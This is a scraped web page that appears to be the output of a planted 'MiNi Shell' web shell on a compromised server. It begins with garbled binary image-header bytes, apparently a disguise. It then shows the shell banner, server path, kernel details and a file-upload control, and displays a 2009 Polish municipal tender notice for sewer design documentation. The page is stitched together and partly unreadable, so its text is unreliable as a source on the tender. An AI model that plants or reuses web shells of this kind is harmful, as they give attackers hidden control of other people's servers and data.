JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090507/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090507/136242-N-2009.html

<p class="kh_header"><b>Opinogóra Górna: Wykonanie dokumentacji projektowo - kosztorysowej na budowę kanalizacji sanitarnej w miejscowościach: Opinogóra Górna, Opinogóra Dolna, Dzbonie.</b><br>
<b>Numer ogłoszenia: 136242 - 2009; data zamieszczenia: 07.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Opinogóra Górna , ul. Z. Krasińskiego 4, 06-406 Opinogóra Górna, woj. mazowieckie, tel. 023 6717024, 6717085, faks 023 6736110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugopinogora.bip.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowo - kosztorysowej na budowę kanalizacji sanitarnej w miejscowościach: Opinogóra Górna, Opinogóra Dolna, Dzbonie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa w zakresie projektowania na wykonanie dokumentacji projektowo - kosztorysowej na budowę kanalizacji sanitarnej dla części miejscowości Opinogóra Górna, Opinogóra Dolna, Dzbonie w gminie Opinogóra Górna obejmująca:
-	wykonanie dwóch (wariantowych) koncepcji budowy kanalizacji sanitarnej,
-	wykonanie projektu z wszystkimi wymaganymi załącznikami opisanymi niżej dla wybranego, bardziej korzystnego wariantu przebiegu sieci,
-	wykonanie projektu przyłączy. 

Zakres zamówienia obejmuje:
ilość przyłączy -  ok. 80 szt., 
ilość przepompowni - ok. 3 szt., 
długość sieci grawitacyjnej - ok. 3,5 km,
długość sieci tłocznej (rurociągi tłoczne) ok. 2,5 km,
Projektowaną sieć kanalizacji sanitarnej należy powiązać z istniejącą pompownią ścieków zlokalizowaną w miejscowości Opinogóra Górna na działce nr ewidencyjny 60/13.

Wykonanie dokumentacji projektowej związane jest z wykonaniem dla Zamawiającego:
1)	projektów budowlanych w zakresie uwzględniającym specyfikę robót budowlanych,
2)	projektów wykonawczych w zakresie, o którym mowa w §5 rozporządzenia ministra infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego(Dz. U. Nr 202, poz. 2072 z późn. zm.),
3)	przedmiarów robót w zakresie, o którym mowa w §6 w/w rozporządzenia,
4)	informacji dotyczącej bezpieczeństwa i ochrony zdrowia - dotyczy projektów, które tego wymagają ze względu na swoja specyfikę - zgodnie z zapisami prawa budowlanego (art. 20 ust. 1 pkt. 1b ustawa z dnia 7 lipca 1994r. Prawo budowlane - Dz. U. z 2006r. Nr 156, poz. 1118 z późn. zm.),
5)	opracowanie specyfikacji technicznych wykonania i odbioru robót budowlanych zgodnie z wymaganiami określonymi w Rozdziale 3 w/w rozporządzenia,
6)	opracowanie kosztorysów inwestorskich zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U. Nr 130, poz. 1389).

Dla wykonania powyższych opracowań wykonawca sporządzi:
1)	opracowanie niezbędnej dokumentacji geotechnicznej,
2)	uzyskanie opinii ZUD,
3)	przygotowanie wniosku i uzyskaniu w imieniu Zamawiającego decyzji o środowiskowych uwarunkowaniach zgody na realizacje przedsięwzięcia,
4)	przygotowanie wniosku i uzyskaniu w imieniu Zamawiającego decyzji o lokalizacji inwestycji celu publicznego,
5)	opracowanie Raportu o oddziaływaniu przedsięwzięcia na środowisko  - o ile w toku postępowania taka konieczność nastąpi,
6)	uzyskanie wszelkich niezbędnych uzgodnień umożliwiających uzyskanie decyzji o pozwoleniu na budowę w tym uzyskanie   zgody   zarządców   dróg na   umieszczenie   sieci   i  przyłączy kanalizacyjnych w pasach drogowych wraz z opracowaniem   projektu organizacji ruchu zastępczego na czas prowadzenia robót.
7)	uzyskanie w imieniu Zamawiającego zgody właścicieli na wejście na grunt i realizacje projektowanej inwestycji (prawo do dysponowania nieruchomością na cele budowlane),
8)	pełnienia nadzoru autorskiego
9)	uzyskaniu warunków technicznych do włączenia do istniejącej sieci kanalizacyjnej w ZUW Mława.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 7.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Wysokość wadium
Wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium
w wysokości: 3 000,00 zł (słownie złotych: trzy tysiące)
1.2. Forma wadium
1.2.1.	Wadium może być wniesione w:
1.2.1.1.	pieniądzu,
1.2.1.2.	poręczeniach bankowych, lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym iż poręczenie kasy jest zawsze poręczeniem pieniężnym.
1.2.1.3.	gwarancjach bankowych,
1.2.1.4.	gwarancjach ubezpieczeniowych,
1.2.1.5.	poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust.5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.)

1.3.	Termin i miejsce wniesienia wadium:
1.3.1.	W przypadku wnoszenia wadium w pieniądzu ustaloną kwotę należy wpłacić na konto zamawiającego w Banku Spółdzielczym w Glinojecku oddział Opinogóra Nr: 25 8229 1015 0000 0345 2000 0070. Kserokopię dowodu wpłaty należy dołączyć do oferty. Kwota wadium musi znaleźć się na rachunku zamawiającego najpóźniej w terminie składania ofert. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
1.3.2.	W przypadku wnoszenia wadium w pozostałych dopuszczalnych formach określonych w Części VI od pkt. 28.1.2. do pkt. 28.1.5. SIWZ kserokopię dokumentu wadium należy dołączyć do oferty, a oryginał należy złożyć w kasie Urzędu Gminy w Opinogórze Górnej.
1.3.3.	Niewniesienie wadium w wymaganym terminie oraz wymaganej wysokości i formie skutkuje wykluczeniem wykonawcy z postępowania.
1.3.4.	Złożone poręczenie lub gwarancja muszą zawierać w swojej treści zobowiązanie zgodne z treścią art. 46 ust. 5 ustawy, tj.: Zamawiający zatrzymuje wadium wraz
z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
- odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
- nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe
z przyczyn leżących po stronie wykonawcy.

1.4.	Zwrot wadium:
1.4.1.	Zamawiający niezwłocznie zwróci wadium, gdy:
1.4.1.1.	upłynął termin związania ofertą,
1.4.1.2.	zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy;
1.4.1.3.	Zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
1.4.2.	Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy:
1.4.2.1.	który wycofał ofertę przed upływem terminu składania ofert;
1.4.2.2.	który został wykluczony z postępowania;
1.4.2.3.	którego oferta została odrzucona.
1.4.3.	Złożenie przez wykonawcę, którego oferta została odrzucona lub wykluczonego
z postępowania, wniosku o zwrot wadium jest równoznaczne ze zrzeczeniem się przez wykonawcę prawa do wniesienia protestu.
1.4.4.	Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej
za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.

1.5.	Utrata wadium
1.5.1.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1.5.1.1. odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
1.5.1.2.	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
1.5.1.3.	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
1.5.2. Zamawiający zatrzymuje wadium wraz z odsetkami , jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3 ustawy, nie złożył dokumentów o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział wykonawcy, którzy:
1.	nie podlegają wykluczeniu z przedmiotowego postępowania na podstawie art. 24
ust. 1 i 2 ustawy;
2.	spełniają warunki określone w art. 22 ust. 1 pkt. 1-3 ustawy oraz spełniają warunki dodatkowe:
2.1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2.1.1.	posiadają uprawnienia do występowania jako podmiot gospodarczy w zakresie objętym niniejszym zamówieniem.
2.2 posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania  zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonywania zamówienia.

2.2.1.udokumentują, iż w okresie ostatnich trzech lat przed wszczęciem postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonali zamówienia obejmujące usługi projektowe o charakterze i złożoności podobnej do przedmiotu zamówienia.
Należy wykazać wykonanie:
w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 zamówień dotyczących wykonania usług projektowych, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia. 
Przez robotę odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, należy rozumieć:
Usługi projektowe dla sieci kanalizacji sanitarnej,  o wartości nie mniejszej niż cena oferty. Należy podać ich wartość oraz daty i miejsca wykonania oraz załączyć dokumenty potwierdzające, że usługi te zostały wykonane należycie. Zrealizowane zamówienia należy wykazać według załączonego wzoru, który stanowi załącznik Nr 4 do SIWZ.
2.2.2 posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem
              technicznym i osobami zdolnymi do wykonania zamówienia, tj.: 
1)	Osoba wskazana do kierowania pracami projektowymi posiada:
a)	wymagane przez Prawo Budowlane uprawnienia budowlane do projektowania w zakresie sieci, instalacji i urządzeń kanalizacyjnych, jest członkiem właściwej izby samorządu zawodowego; 

Wykaz kadry technicznej należy przedstawić według załączonego wzoru, który stanowi załącznik Nr 5. do SIWZ. 
2.4.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
2.5. wniosą wadium w wymaganym terminie, wysokości i formie;
Uwaga: Złożenie przez wykonawcę w ofercie dokumentów i oświadczeń niżej wymienionych 
będzie stanowiło podstawę do oceny spełnienia warunków udziału w postępowaniu. Zamawiający ustali na podstawie treści tych dokumentów i oświadczeń czy wykonawca spełnia wszystkie wyżej wymienione warunki, stosując zasadę (spełnia - nie spełnia)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca zobowiązany jest złożyć w terminie wskazanym w Części VIII pkt. 35 i formie określonej w Części VII pkt. 32 SIWZ:
1.	Ofertę na formularzu ofertowym o treści zgodnej z określoną we wzorze stanowiącym załącznik Nr 1 do SIWZ.
2.	Oświadczenia oraz dokumenty potwierdzające spełnianie warunków:
2.1.	Oświadczenie o niepodleganiu wykluczeniu z przedmiotowego postępowania 
na podstawie art. 24 ust. 1 w związku z art. 22 ust. 1 pkt 4 ustawy - według wzoru określonego w załączniku Nr 2 do SIWZ. 
2.2.	Oświadczenie o spełnieniu warunków określonych w art. 22 ust.1 pkt 1-3 ustawy -
według wzoru określonego w załączniku Nr 3 do SIWZ.
2.3.	Dokument potwierdzający dopuszczenie wykonawcy do obrotu prawnego
w zakresie objętym zamówieniem - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie  wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę).
2.4.	Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków i opłat
lub zaświadczenie, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu podatkowego wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert (w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę).
2.5.	Aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne
lub społeczne lub zaświadczenie, że uzyskał zgodę na zwolnienie, odroczenie
lub rozłożenie na raty zaległych płatności wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert (w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę).
2.6.	Potwierdzenie wniesienia wadium.
2.7.	Wykaz zamówień - według wzoru stanowiącego załącznik Nr 4 do SIWZ.
Do wykazu należy dołączyć dokumenty (w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę) potwierdzające należyte wykonanie zamówień.
2.8.	Wykaz osób - według wzoru stanowiącego załącznik Nr 5 do SIWZ.
Do wykazu należy dołączyć kopie uprawnień budowlanych i zaświadczeń 
o członkostwie w Izbie Inżynierów Budownictwa poświadczone za zgodność 
z oryginałem przez wykonawcę oraz podać pełnioną rolę w realizacji zamówienia.
3.	Potwierdzony Harmonogram Rzeczowo - Finansowy  sporządzony wg załączonego wzoru.
4.	W przypadku, gdy wykonawcę reprezentuje pełnomocnik, do oferty musi być załączone pełnomocnictwo (oryginał), określające jego zakres i podpisane przez osoby uprawnione do reprezentacji wykonawcy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 70</li>
<li>2 - Termin realizacji zamówienia - 30</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://ugopinogora.bip.org.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Opinogórze Górnej ul. Z. Krasińskiego 4, 06-406 Opinogóra, pokój nr 8.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.05.2009 godzina 10:00, miejsce: Urząd Gminy w Opinogórze Górnej ul. Z. Krasińskiego 4, 06-406 Opinogóra, Sekretariat, I piętro, pokój nr 18..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com